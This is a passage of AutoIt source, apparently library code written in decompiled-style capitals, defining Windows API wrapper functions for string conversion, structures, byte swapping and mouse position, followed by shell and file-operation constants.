("kernel32.dll" , "int" , "MultiByteToWideChar" , "uint" , $ICODEPAGE , "dword" , $IFLAGS , "STR" , $STEXT , "int" , + 4294967295 , "struct*" , $PTEXT , "int" , (STRINGLEN ($STEXT ) + 1 ) * 2 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_OEMTOCHAR ($SSTR ) LOCAL $ARET = DLLCALL ("user32.dll" , "bool" , "OemToChar" , "str" , $SSTR , "str" , "" ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_POINTFROMRECT (BYREF $TRECT , $BCENTER = TRUE ) LOCAL $IX1 = DLLSTRUCTGETDATA ($TRECT , "Left" ) LOCAL $IY1 = DLLSTRUCTGETDATA ($TRECT , "Top" ) LOCAL $IX2 = DLLSTRUCTGETDATA ($TRECT , "Right" ) LOCAL $IY2 = DLLSTRUCTGETDATA ($TRECT , "Bottom" ) IF $BCENTER THEN $IX1 = $IX1 + (($IX2 - $IX1 ) / 2 ) $IY1 = $IY1 + (($IY2 - $IY1 ) / 2 ) ENDIF LOCAL $TPOINT = DLLSTRUCTCREATE ($TAGPOINT ) DLLSTRUCTSETDATA ($TPOINT , "X" , $IX1 ) DLLSTRUCTSETDATA ($TPOINT , "Y" , $IY1 ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_PRIMARYLANGID ($ILNGID ) RETURN BITAND ($ILNGID , 1023 ) ENDFUNC FUNC _WINAPI_SCREENTOCLIENT ($HWND , BYREF $TPOINT ) LOCAL $ARESULT = DLLCALL ("user32.dll" , "bool" , "ScreenToClient" , "hwnd" , $HWND , "struct*" , $TPOINT ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_SHORTTOWORD ($IVALUE ) RETURN BITAND ($IVALUE , 65535 ) ENDFUNC FUNC _WINAPI_STRFORMATBYTESIZE ($ISIZE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "StrFormatByteSizeW" , "int64" , $ISIZE , "wstr" , "" , "uint" , 1024 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_STRFORMATBYTESIZEEX ($ISIZE ) LOCAL $ASYMBOL = DLLCALL ("kernel32.dll" , "int" , "GetLocaleInfoW" , "dword" , 1024 , "dword" , 15 , "wstr" , "" , "int" , 2048 ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) LOCAL $SSIZE = _WINAPI_STRFORMATBYTESIZE (0 ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN STRINGREPLACE ($SSIZE , "0" , STRINGREGEXPREPLACE (NUMBER ($ISIZE ) , "(?<=\d)(?=(\d{3})+\z)" , $ASYMBOL [3 ] ) ) ENDFUNC FUNC _WINAPI_STRFORMATKBSIZE ($ISIZE ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "ptr" , "StrFormatKBSizeW" , "int64" , $ISIZE , "wstr" , "" , "uint" , 1024 ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN $ARET [2 ] ENDFUNC FUNC _WINAPI_STRFROMTIMEINTERVAL ($ITIME , $IDIGITS = 7 ) LOCAL $ARET = DLLCALL ("shlwapi.dll" , "int" , "StrFromTimeIntervalW" , "wstr" , "" , "uint" , 1024 , "dword" , $ITIME , "int" , $IDIGITS ) IF @ERROR OR NOT $ARET [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) RETURN STRINGSTRIPWS ($ARET [1 ] , $STR_STRIPLEADING + $STR_STRIPTRAILING ) ENDFUNC FUNC _WINAPI_STRINGFROMGUID ($TGUID ) LOCAL $ARESULT = DLLCALL ("ole32.dll" , "int" , "StringFromGUID2" , "struct*" , $TGUID , "wstr" , "" , "int" , 40 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR , @EXTENDED , "" ) RETURN SETEXTENDED ($ARESULT [0 ] , $ARESULT [2 ] ) ENDFUNC FUNC _WINAPI_SUBLANGID ($ILNGID ) RETURN BITSHIFT ($ILNGID , 10 ) ENDFUNC FUNC _WINAPI_SWAPDWORD ($IVALUE ) LOCAL $TSTRUCT1 = DLLSTRUCTCREATE ("dword;dword" ) LOCAL $TSTRUCT2 = DLLSTRUCTCREATE ("byte[4];byte[4]" , DLLSTRUCTGETPTR ($TSTRUCT1 ) ) DLLSTRUCTSETDATA ($TSTRUCT1 , 1 , $IVALUE ) FOR $I = 1 TO 4 DLLSTRUCTSETDATA ($TSTRUCT2 , 2 , DLLSTRUCTGETDATA ($TSTRUCT2 , 1 , 5 - $I ) , $I ) NEXT RETURN DLLSTRUCTGETDATA ($TSTRUCT1 , 2 ) ENDFUNC FUNC _WINAPI_SWAPQWORD ($IVALUE ) LOCAL $TSTRUCT1 = DLLSTRUCTCREATE ("int64;int64" ) LOCAL $TSTRUCT2 = DLLSTRUCTCREATE ("byte[8];byte[8]" , DLLSTRUCTGETPTR ($TSTRUCT1 ) ) DLLSTRUCTSETDATA ($TSTRUCT1 , 1 , $IVALUE ) FOR $I = 1 TO 8 DLLSTRUCTSETDATA ($TSTRUCT2 , 2 , DLLSTRUCTGETDATA ($TSTRUCT2 , 1 , 9 - $I ) , $I ) NEXT RETURN DLLSTRUCTGETDATA ($TSTRUCT1 , 2 ) ENDFUNC FUNC _WINAPI_SWAPWORD ($IVALUE ) LOCAL $TSTRUCT1 = DLLSTRUCTCREATE ("word;word" ) LOCAL $TSTRUCT2 = DLLSTRUCTCREATE ("byte[2];byte[2]" , DLLSTRUCTGETPTR ($TSTRUCT1 ) ) DLLSTRUCTSETDATA ($TSTRUCT1 , 1 , $IVALUE ) FOR $I = 1 TO 2 DLLSTRUCTSETDATA ($TSTRUCT2 , 2 , DLLSTRUCTGETDATA ($TSTRUCT2 , 1 , 3 - $I ) , $I ) NEXT RETURN DLLSTRUCTGETDATA ($TSTRUCT1 , 2 ) ENDFUNC FUNC _WINAPI_WIDECHARTOMULTIBYTE ($VUNICODE , $ICODEPAGE = 0 , $BRETNOSTRUCT = TRUE , $BRETBINARY = FALSE ) LOCAL $SUNICODETYPE = "wstr" IF NOT ISSTRING ($VUNICODE ) THEN $SUNICODETYPE = "struct*" LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "WideCharToMultiByte" , "uint" , $ICODEPAGE , "dword" , 0 , $SUNICODETYPE , $VUNICODE , "int" , + 4294967295 , "ptr" , 0 , "int" , 0 , "ptr" , 0 , "ptr" , 0 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , "" ) LOCAL $TMULTIBYTE = DLLSTRUCTCREATE ((($BRETBINARY ) ("byte" ) ("char" ) ) & "[" & $ARESULT [0 ] & "]" ) $ARESULT = DLLCALL ("kernel32.dll" , "int" , "WideCharToMultiByte" , "uint" , $ICODEPAGE , "dword" , 0 , $SUNICODETYPE , $VUNICODE , "int" , + 4294967295 , "struct*" , $TMULTIBYTE , "int" , $ARESULT [0 ] , "ptr" , 0 , "ptr" , 0 ) IF @ERROR OR NOT $ARESULT [0 ] THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , "" ) IF $BRETNOSTRUCT THEN RETURN DLLSTRUCTGETDATA ($TMULTIBYTE , 1 ) RETURN $TMULTIBYTE ENDFUNC FUNC _WINAPI_WORDTOSHORT ($IVALUE ) IF BITAND ($IVALUE , 32768 ) THEN RETURN BITOR ($IVALUE , 4294934528 ) ENDIF RETURN BITAND ($IVALUE , 32767 ) ENDFUNC #EndRegion Public Functions #Region Global Variables and Constants #EndRegion Global Variables and Constants #Region Functions list #EndRegion Functions list #Region Public Functions FUNC _WINAPI_ARRAYTOSTRUCT (CONST BYREF $ADATA , $ISTART = 0 , $IEND = + 4294967295 ) IF __CHECKERRORARRAYBOUNDS ($ADATA , $ISTART , $IEND ) THEN RETURN SETERROR (@ERROR + 10 , @EXTENDED , 0 ) LOCAL $TAGSTRUCT = "" FOR $I = $ISTART TO $IEND $TAGSTRUCT &= "wchar[" & (STRINGLEN ($ADATA [$I ] ) + 1 ) & "];" NEXT LOCAL $TDATA = DLLSTRUCTCREATE ($TAGSTRUCT & "wchar[1]" ) LOCAL $ICOUNT = 1 FOR $I = $ISTART TO $IEND DLLSTRUCTSETDATA ($TDATA , $ICOUNT , $ADATA [$I ] ) $ICOUNT += 1 NEXT DLLSTRUCTSETDATA ($TDATA , $ICOUNT , CHRW (0 ) ) RETURN $TDATA ENDFUNC FUNC _WINAPI_CREATEMARGINS ($ILEFTWIDTH , $IRIGHTWIDTH , $ITOPHEIGHT , $IBOTTOMHEIGHT ) LOCAL $TMARGINS = DLLSTRUCTCREATE ($TAGMARGINS ) DLLSTRUCTSETDATA ($TMARGINS , 1 , $ILEFTWIDTH ) DLLSTRUCTSETDATA ($TMARGINS , 2 , $IRIGHTWIDTH ) DLLSTRUCTSETDATA ($TMARGINS , 3 , $ITOPHEIGHT ) DLLSTRUCTSETDATA ($TMARGINS , 4 , $IBOTTOMHEIGHT ) RETURN $TMARGINS ENDFUNC FUNC _WINAPI_CREATEPOINT ($IX , $IY ) LOCAL $TPOINT = DLLSTRUCTCREATE ($TAGPOINT ) DLLSTRUCTSETDATA ($TPOINT , 1 , $IX ) DLLSTRUCTSETDATA ($TPOINT , 2 , $IY ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_CREATERECT ($ILEFT , $ITOP , $IRIGHT , $IBOTTOM ) LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) DLLSTRUCTSETDATA ($TRECT , 1 , $ILEFT ) DLLSTRUCTSETDATA ($TRECT , 2 , $ITOP ) DLLSTRUCTSETDATA ($TRECT , 3 , $IRIGHT ) DLLSTRUCTSETDATA ($TRECT , 4 , $IBOTTOM ) RETURN $TRECT ENDFUNC FUNC _WINAPI_CREATERECTEX ($IX , $IY , $IWIDTH , $IHEIGHT ) LOCAL $TRECT = DLLSTRUCTCREATE ($TAGRECT ) DLLSTRUCTSETDATA ($TRECT , 1 , $IX ) DLLSTRUCTSETDATA ($TRECT , 2 , $IY ) DLLSTRUCTSETDATA ($TRECT , 3 , $IX + $IWIDTH ) DLLSTRUCTSETDATA ($TRECT , 4 , $IY + $IHEIGHT ) RETURN $TRECT ENDFUNC FUNC _WINAPI_CREATESIZE ($IWIDTH , $IHEIGHT ) LOCAL $TSIZE = DLLSTRUCTCREATE ($TAGSIZE ) DLLSTRUCTSETDATA ($TSIZE , 1 , $IWIDTH ) DLLSTRUCTSETDATA ($TSIZE , 2 , $IHEIGHT ) RETURN $TSIZE ENDFUNC FUNC _WINAPI_COPYSTRUCT ($TSTRUCT , $SSTRUCT = "" ) LOCAL $ISIZE = DLLSTRUCTGETSIZE ($TSTRUCT ) IF NOT $ISIZE THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $TRESULT IF NOT STRINGSTRIPWS ($SSTRUCT , $STR_STRIPLEADING + $STR_STRIPTRAILING + $STR_STRIPSPACES ) THEN $TRESULT = DLLSTRUCTCREATE ("byte[" & $ISIZE & "]" ) ELSE $TRESULT = DLLSTRUCTCREATE ($SSTRUCT ) ENDIF IF DLLSTRUCTGETSIZE ($TRESULT ) < $ISIZE THEN RETURN SETERROR (2 , 0 , 0 ) _WINAPI_MOVEMEMORY ($TRESULT , $TSTRUCT , $ISIZE ) RETURN $TRESULT ENDFUNC FUNC _WINAPI_GETEXTENDED () RETURN $__G_VEXT ENDFUNC FUNC _WINAPI_GETMOUSEPOS ($BTOCLIENT = FALSE , $HWND = 0 ) LOCAL $IMODE = OPT ("MouseCoordMode" , 1 ) LOCAL $APOS = MOUSEGETPOS () OPT ("MouseCoordMode" , $IMODE ) LOCAL $TPOINT = DLLSTRUCTCREATE ($TAGPOINT ) DLLSTRUCTSETDATA ($TPOINT , "X" , $APOS [0 ] ) DLLSTRUCTSETDATA ($TPOINT , "Y" , $APOS [1 ] ) IF $BTOCLIENT AND NOT _WINAPI_SCREENTOCLIENT ($HWND , $TPOINT ) THEN RETURN SETERROR (@ERROR + 20 , @EXTENDED , 0 ) RETURN $TPOINT ENDFUNC FUNC _WINAPI_GETMOUSEPOSX ($BTOCLIENT = FALSE , $HWND = 0 ) LOCAL $TPOINT = _WINAPI_GETMOUSEPOS ($BTOCLIENT , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TPOINT , "X" ) ENDFUNC FUNC _WINAPI_GETMOUSEPOSY ($BTOCLIENT = FALSE , $HWND = 0 ) LOCAL $TPOINT = _WINAPI_GETMOUSEPOS ($BTOCLIENT , $HWND ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN DLLSTRUCTGETDATA ($TPOINT , "Y" ) ENDFUNC FUNC _WINAPI_MULDIV ($INUMBER , $INUMERATOR , $IDENOMINATOR ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "MulDiv" , "int" , $INUMBER , "int" , $INUMERATOR , "int" , $IDENOMINATOR ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , + 4294967295 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_PLAYSOUND ($SSOUND , $IFLAGS = $SND_SYSTEM_NOSTOP , $HINSTANCE = 0 ) LOCAL $STYPEOFSOUND = "ptr" IF $SSOUND THEN IF ISSTRING ($SSOUND ) THEN $STYPEOFSOUND = "wstr" ENDIF ELSE $SSOUND = 0 $IFLAGS = 0 ENDIF LOCAL $ARET = DLLCALL ("winmm.dll" , "bool" , "PlaySoundW" , $STYPEOFSOUND , $SSOUND , "handle" , $HINSTANCE , "dword" , $IFLAGS ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , FALSE ) RETURN $ARET [0 ] ENDFUNC FUNC _WINAPI_STRINGLENA (CONST BYREF $TSTRING ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "lstrlenA" , "struct*" , $TSTRING ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_STRINGLENW (CONST BYREF $TSTRING ) LOCAL $ARESULT = DLLCALL ("kernel32.dll" , "int" , "lstrlenW" , "struct*" , $TSTRING ) IF @ERROR THEN RETURN SETERROR (@ERROR , @EXTENDED , 0 ) RETURN $ARESULT [0 ] ENDFUNC FUNC _WINAPI_STRUCTTOARRAY (BYREF $TSTRUCT , $IITEMS = 0 ) LOCAL $ISIZE = 2 * FLOOR (DLLSTRUCTGETSIZE ($TSTRUCT ) / 2 ) LOCAL $PSTRUCT = DLLSTRUCTGETPTR ($TSTRUCT ) IF NOT $ISIZE OR NOT $PSTRUCT THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $TDATA , $ILENGTH , $IOFFSET = 0 LOCAL $ARESULT [101 ] = [0 ] WHILE 1 $ILENGTH = _WINAPI_STRLEN ($PSTRUCT + $IOFFSET ) IF NOT $ILENGTH THEN EXITLOOP ENDIF IF 2 * (1 + $ILENGTH ) + $IOFFSET > $ISIZE THEN RETURN SETERROR (3 , 0 , 0 ) $TDATA = DLLSTRUCTCREATE ("wchar[" & (1 + $ILENGTH ) & "]" , $PSTRUCT + $IOFFSET ) IF @ERROR THEN RETURN SETERROR (@ERROR + 10 , 0 , 0 ) __INC ($ARESULT ) $ARESULT [$ARESULT [0 ] ] = DLLSTRUCTGETDATA ($TDATA , 1 ) IF $ARESULT [0 ] = $IITEMS THEN EXITLOOP ENDIF $IOFFSET += 2 * (1 + $ILENGTH ) IF $IOFFSET >= $ISIZE THEN RETURN SETERROR (3 , 0 , 0 ) WEND IF NOT $ARESULT [0 ] THEN RETURN SETERROR (2 , 0 , 0 ) __INC ($ARESULT , + 4294967295 ) RETURN $ARESULT ENDFUNC FUNC _WINAPI_UNIONSTRUCT ($TSTRUCT1 , $TSTRUCT2 , $SSTRUCT = "" ) LOCAL $ASIZE [2 ] = [DLLSTRUCTGETSIZE ($TSTRUCT1 ) , DLLSTRUCTGETSIZE ($TSTRUCT2 ) ] IF NOT $ASIZE [0 ] OR NOT $ASIZE [1 ] THEN RETURN SETERROR (1 , 0 , 0 ) LOCAL $TRESULT IF NOT STRINGSTRIPWS ($SSTRUCT , $STR_STRIPLEADING + $STR_STRIPTRAILING + $STR_STRIPSPACES ) THEN $TRESULT = DLLSTRUCTCREATE ("byte[" & ($ASIZE [0 ] + $ASIZE [1 ] ) & "]" ) ELSE $TRESULT = DLLSTRUCTCREATE ($SSTRUCT ) ENDIF IF DLLSTRUCTGETSIZE ($TRESULT ) < ($ASIZE [0 ] + $ASIZE [1 ] ) THEN RETURN SETERROR (2 , 0 , 0 ) _WINAPI_MOVEMEMORY ($TRESULT , $TSTRUCT1 , $ASIZE [0 ] ) _WINAPI_MOVEMEMORY (DLLSTRUCTGETPTR ($TRESULT ) + $ASIZE [0 ] , $TSTRUCT2 , $ASIZE [1 ] ) RETURN $TRESULT ENDFUNC #EndRegion Public Functions GLOBAL CONST $DLLVER_PLATFORM_WINDOWS = 1 GLOBAL CONST $DLLVER_PLATFORM_NT = 2 GLOBAL CONST $SHCNE_ALLEVENTS = 2147483647 GLOBAL CONST $SHCNE_ASSOCCHANGED = 134217728 GLOBAL CONST $SHCNE_ATTRIBUTES = 2048 GLOBAL CONST $SHCNE_CREATE = 2 GLOBAL CONST $SHCNE_DELETE = 4 GLOBAL CONST $SHCNE_DRIVEADD = 256 GLOBAL CONST $SHCNE_DRIVEADDGUI = 65536 GLOBAL CONST $SHCNE_DRIVEREMOVED = 128 GLOBAL CONST $SHCNE_EXTENDED_EVENT = 67108864 GLOBAL CONST $SHCNE_FREESPACE = 262144 GLOBAL CONST $SHCNE_MEDIAINSERTED = 32 GLOBAL CONST $SHCNE_MEDIAREMOVED = 64 GLOBAL CONST $SHCNE_MKDIR = 8 GLOBAL CONST $SHCNE_NETSHARE = 512 GLOBAL CONST $SHCNE_NETUNSHARE = 1024 GLOBAL CONST $SHCNE_RENAMEFOLDER = 131072 GLOBAL CONST $SHCNE_RENAMEITEM = 1 GLOBAL CONST $SHCNE_RMDIR = 16 GLOBAL CONST $SHCNE_SERVERDISCONNECT = 16384 GLOBAL CONST $SHCNE_UPDATEDIR = 4096 GLOBAL CONST $SHCNE_UPDATEIMAGE = 32768 GLOBAL CONST $SHCNE_UPDATEITEM = 8192 GLOBAL CONST $SHCNE_DISKEVENTS = 145439 GLOBAL CONST $SHCNE_GLOBALEVENTS = 201687520 GLOBAL CONST $SHCNE_INTERRUPT = 2147483648 GLOBAL CONST $SHCNF_DWORD = 3 GLOBAL CONST $SHCNF_IDLIST = 0 GLOBAL CONST $SHCNF_PATH = 1 GLOBAL CONST $SHCNF_PRINTER = 2 GLOBAL CONST $SHCNF_FLUSH = 4096 GLOBAL CONST $SHCNF_FLUSHNOWAIT = 8192 GLOBAL CONST $SHCNF_NOTIFYRECURSIVE = 65536 GLOBAL CONST $SHCNRF_INTERRUPTLEVEL = 1 GLOBAL CONST $SHCNRF_SHELLLEVEL = 2 GLOBAL CONST $SHCNRF_RECURSIVEINTERRUPT = 4096 GLOBAL CONST $SHCNRF_NEWDELIVERY = 32768 GLOBAL CONST $SHERB_NOCONFIRMATION = 1 GLOBAL CONST $SHERB_NOPROGRESSUI = 2 GLOBAL CONST $SHERB_NOSOUND = 4 GLOBAL CONST $SHERB_NO_UI = BITOR ($SHERB_NOCONFIRMATION , $SHERB_NOPROGRESSUI , $SHERB_NOSOUND ) GLOBAL CONST $SEE_MASK_DEFAULT = 0 GLOBAL CONST $SEE_MASK_CLASSNAME = 1 GLOBAL CONST $SEE_MASK_CLASSKEY = 3 GLOBAL CONST $SEE_MASK_IDLIST = 4 GLOBAL CONST $SEE_MASK_INVOKEIDLIST = 12 GLOBAL CONST $SEE_MASK_ICON = 16 GLOBAL CONST $SEE_MASK_HOTKEY = 32 GLOBAL CONST $SEE_MASK_NOCLOSEPROCESS = 64 GLOBAL CONST $SEE_MASK_CONNECTNETDRV = 128 GLOBAL CONST $SEE_MASK_NOASYNC = 256 GLOBAL CONST $SEE_MASK_FLAG_DDEWAIT = $SEE_MASK_NOASYNC GLOBAL CONST $SEE_MASK_DOENVSUBST = 512 GLOBAL CONST $SEE_MASK_FLAG_NO_UI = 1024 GLOBAL CONST $SEE_MASK_UNICODE = 16384 GLOBAL CONST $SEE_MASK_NO_CONSOLE = 32768 GLOBAL CONST $SEE_MASK_ASYNCOK = 1048576 GLOBAL CONST $SEE_MASK_NOQUERYCLASSSTORE = 16777216 GLOBAL CONST $SEE_MASK_HMONITOR = 2097152 GLOBAL CONST $SEE_MASK_NOZONECHECKS = 8388608 GLOBAL CONST $SEE_MASK_WAITFORINPUTIDLE = 33554432 GLOBAL CONST $SEE_MASK_FLAG_LOG_USAGE = 67108864 GLOBAL CONST $SE_ERR_ACCESSDENIED = 5 GLOBAL CONST $SE_ERR_ASSOCINCOMPLETE = 27 GLOBAL CONST $SE_ERR_DDEBUSY = 30 GLOBAL CONST $SE_ERR_DDEFAIL = 29 GLOBAL CONST $SE_ERR_DDETIMEOUT = 28 GLOBAL CONST $SE_ERR_DLLNOTFOUND = 32 GLOBAL CONST $SE_ERR_FNF = 2 GLOBAL CONST $SE_ERR_NOASSOC = 31 GLOBAL CONST $SE_ERR_OOM = 8 GLOBAL CONST $SE_ERR_PNF = 3 GLOBAL CONST $SE_ERR_SHARE = 26 GLOBAL CONST $FO_COPY = 2 GLOBAL CONST $FO_DELETE = 3 GLOBAL CONST $FO_MOVE = 1 GLOBAL CONST $FO_RENAME = 4 GLOBAL CONST $FOF_ALLOWUNDO = 64 GLOBAL CONST $FOF_CONFIRMMOUSE = 2 GLOBAL CONST $FOF_FILESONLY = 128 GLOBAL CONST $FOF_MULTIDESTFILES = 1 GLOBAL CONST $FOF_NOCONFIRMATION = 16 GLOBAL CONST $FOF_NOCONFIRMMKDIR = 512 GLOBAL CONST $FOF_NO_CONNECTED_ELEMENTS = 8192 GLOBAL CONST $FOF_NOCOPYSECURITYATTRIBS = 2048 GLOBAL CONST $FOF_NOERRORUI = 1024 GLOBAL CONST $FOF_NORECURSEREPARSE = 32768 GLOBAL CONST $FOF_NORECURSION = 4096 GLOBAL CONST $FOF_RENAMEONCOLLISION = 8 GLOBAL CONST $FOF_SILENT = 4 GLOBAL CONST $FOF_SIMPLEPROGRESS = 256 GLOBAL CONST $FOF_WANTMAPPINGHANDLE = 32 GLOBAL CONST $FOF_WANTNUKEWARNING = 16384 GLOBAL CONST $FOF_NO_UI = BITOR ($FOF_NOCONFIRMATION , $FOF_NOCONFIRMMKDIR , $FOF_NOERRORUI , $FOF_SILENT ) GLOBAL CONST $SHGFI_ADDOVERLAYS = 32 GLOBAL CONST $SHGFI_ATTR_SPECIFIED = 131072 GLOBAL CONST $SHGFI_ATTRIBUTES = 2048 GLOBAL CONST $SHGFI_DISPLAYNAME = 512 GLOBAL CONST $SHGFI_EXETYPE = 8192 GLOBAL CONST $SHGFI_ICON = 256 GLOBAL CONST $SHGFI_ICONLOCATION = 4096 GLOBAL CONST $SHGFI_LARGEICON = 0 GLOBAL CONST $SHGFI_LINKOVERLAY = 32768 GLOBAL CONST $SHGFI_OPENICON = 2 GLOBAL CONST $SHGFI_OVERLAYINDEX = 64 GLOBAL CONST $SHGFI_PIDL = 8 GLOBAL CONST $SHGFI_SELECTED = 65536 GLOBAL CONST $SHGFI_SHELLICONSIZE = 4 GLOBAL CONST $SHGFI_SMALLICON = 1 GLOBAL CONST $SHGFI_SYSICONINDEX = 16384 GLOBAL CONST $SHGFI_TYPENAME = 1024 GLOBAL CONST $SHGFI_USEFILEATTRIBUTES = 16 GLOBAL CONST $SFGAO_CANCOPY = 1 GLOBAL CONST $SFGAO_CANMOVE = 2 GLOBAL CONST $SFGAO_CANLINK = 4 GLOBAL CONST $SFGAO_STORAGE = 8 GLOBAL CONST $SFGAO_CANRENAME = 16 GLOBAL CONST $SFGAO_CANDELETE = 32 GLOBAL CONST $SFGAO_HASPROPSHEET = 64 GLOBAL CONST $SFGAO_DROPTARGET = 256 GLOBAL CONST $SFGAO_CAPABILITYMASK = BITOR ($SFGAO_CANCOPY , $SFGAO_CANMOVE , $SFGAO_CANLINK , $SFGAO_CANRENAME , $SFGAO_CANDELETE , $SFGAO_HASPROPSHEET , $SFGAO_DROPTARGET ) GLOBAL CONST $SFGAO_SYSTEM = 4096 GLOBAL CONST $SFGAO_ENCRYPTED = 8192 GLOBAL CONST $SFGAO_ISSLOW = 16384 GLOBAL CONST $SFGAO_GHOSTED = 32768 GLOBAL CONST $SFGAO_LINK = 65536 GLOBAL CONST $SFGAO_SHARE = 131072 GLOBAL CONST $SFGAO_READONLY = 262144 GLOBAL CONST $SFGAO_HIDDEN = 524288 GLOBAL CONST $SFGAO_DISPLAYATTRMASK = BITOR ($SFGAO_ISSLOW , $SFGAO_GHOSTED , $SFGAO_LINK , $SFGAO_SHARE , $SFGAO_READONLY , $SFGAO_HIDDEN ) GLOBAL CONST $SFGAO_NONENUMERATED = 1048576 GLOBAL CONST $SFGAO_NEWCONTENT = 2097152 GLOBAL CONST $SFGAO_STREAM = 4194304 GLOBAL CONST $SFGAO_STORAGEANCESTOR = 8388608 GLOBAL CONST $SFGAO_VALIDATE = 16777216 GLOBAL CONST $SFGAO_REMOVABLE = 33554432 GLOBAL CONST $SFGAO_COMPRESSED = 67108864 GLOBAL CONST $SFGAO_BROWSABLE = 134217728 GLOBAL CONST $SFGAO_FILESYSANCESTOR = 268435456 GLOBAL CONST $SFGAO_FOLDER = 536870912 GLOBAL CONST $SFGAO_FILESYSTEM = 1073741824 GLOBAL CONST $SFGAO_STORAGECAPMASK = BITOR ($SFGAO_STORAGE , $SFGAO_LINK , $SFGAO_READONLY , $SFGAO_STREAM , $SFGAO_STORAGEANCESTOR , $SFGAO_FILESYSANCESTOR , $SFGAO_FOLDER , $SFGAO_FILESYSTEM ) GLOBAL CONST $SFGAO_HASSUBFOLDER = 2147483648 GLOBAL CONST $SFGAO_CONTENTSMASK = $SFGAO_HASSUBFOLDER GLOBAL CONST $SFGAO_PKEYSFGAOMASK = BITOR ($SFGAO_ISSLOW , $SFGAO_READONLY , $SFGAO_HASSUBFOLDER , $SFGAO_VALIDATE ) GLOBAL CONST $IDO_SHGIOI_DEFAULT = 268435452 GLOBAL CONST $IDO_SHGIOI_LINK = 268435454 GLOBAL CONST $IDO_SHGIOI_SHARE = 268435455 GLOBAL CONST $IDO_SHGIOI_SLOWFILE = 268435453 GLOBAL CONST $FCSM_VIEWID = 1 GLOBAL CONST $FCSM_WEBVIEWTEMPLATE = 2 GLOBAL CONST $FCSM_INFOTIP = 4 GLOBAL CONST $FCSM_CLSID = 8 GLOBAL CONST $FCSM_ICONFILE = 16 GLOBAL CONST $FCSM_LOGO = 32 GLOBAL CONST $FCSM_FLAGS = 64 GLOBAL CONST $FCS_READ = 1 GLOBAL CONST $FCS_FORCEWRITE = 2 GLOBAL CONST $FCS_WRITE = BITOR ($FCS_READ , $FCS_FORCEWRITE ) GLOBAL CONST $SSF_AUTOCHECKSELECT = 8388608 GLOBAL CONST $SSF_DESKTOPHTML = 512 GLOBAL CONST $SSF_DONTPRETTYPATH = 2048 GLOBAL CONST $SSF_DOUBLECLICKINWEBVIEW = 128 GLOBAL CONST $SSF_HIDEICONS = 16384 GLOBAL CONST $SSF_ICONSONLY = 16777216 GLOBAL CONST $SSF_MAPNETDRVBUTTON = 4096 GLOBAL CONST $SSF_NOCONFIRMRECYCLE = 32768 GLOBAL CONST $SSF_NONETCRAWLING = 1048576 GLOBAL CONST $SSF_SEPPROCESS = 524288 GLOBAL CONST $SSF_SHOWALLOBJECTS = 1 GLOBAL CONST $SSF_SHOWCOMPCOLOR = 8 GLOBAL CONST $SSF_SHOWEXTENSIONS = 2 GLOBAL CONST $SSF_SHOWINFOTIP = 8192 GLOBAL CONST $SSF_SHOWSUPERHIDDEN = 262144 GLOBAL CONST $SSF_SHOWSYSFILES = 32 GLOBAL CONST $SSF_SHOWTYPEOVERLAY = 33554432 GLOBAL CONST $SSF_STARTPANELON = 2097152 GLOBAL CONST $SSF_WIN95CLASSIC = 1024 GLOBAL CONST $SSF_WEBVIEW = 131072 GLOBAL CONST $CSIDL_ADMINTOOLS = 48 GLOBAL CONST $CSIDL_ALTSTARTUP = 29 GLOBAL CONST $CSIDL_APPDATA = 26 GLOBAL CONST $CSIDL_BITBUCKET = 10 GLOBAL CONST $CSIDL_CDBURN_AREA = 59 GLOBAL CONST $CSIDL_COMMON_ADMINTOOLS = 47 GLOBAL CONST $CSIDL_COMMON_ALTSTARTUP = 30 GLOBAL CONST $CSIDL_COMMON_APPDATA = 35 GLOBAL CONST $CSIDL_COMMON_DESKTOPDIRECTORY = 25 GLOBAL CONST $CSIDL_COMMON_DOCUMENTS = 46 GLOBAL CONST $CSIDL_COMMON_FAVORITES = 31 GLOBAL CONST $CSIDL_COMMON_MUSIC = 53 GLOBAL CONST $CSIDL_COMMON_PICTURES = 54 GLOBAL CONST $CSIDL_COMMON_PROGRAMS = 23 GLOBAL CONST $CSIDL_COMMON_STARTMENU = 22 GLOBAL CONST $CSIDL_COMMON_STARTUP = 24 GLOBAL CONST $CSIDL_COMMON_TEMPLATES = 45 GLOBAL CONST 